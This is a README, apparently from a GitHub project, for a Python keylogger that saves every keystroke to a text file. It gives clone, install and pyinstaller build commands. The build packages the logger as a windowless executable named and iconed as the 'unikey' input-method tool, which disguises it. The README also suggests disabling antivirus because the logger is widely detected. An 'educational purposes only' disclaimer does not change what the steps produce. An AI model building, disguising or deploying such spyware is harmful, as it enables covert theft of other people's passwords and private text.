FOR EDUCATIONAL PURPOSES ONLY
A simple key logger that logs all the keys pressed by the user and saves them in a text file.
git clone https://github.com/TienNHM/key_logger.gitpip install pynput
pip install pyinstallerpyinstaller --onefile --windowed --icon=unikey.ico --name=unikey --manifest=app.manifest key_logger.pydist/unikey.exe- The key logger will start logging all the keys pressed by the user and save them in a text file named
keylog.txt. - To stop the key logger, open the task manager and end the process
key_logger.exe.
- The key logger is for educational purposes only, should not be used for malicious purposes.
- The key logger is detected by most antivirus software, so it is recommended to run it on a virtual machine or disable the antivirus software (at your own risk).
- When running the key logger, the user should be aware that all the keys pressed will be logged and saved in a text file. Key logger program can be found in the task manager and stopped at any time.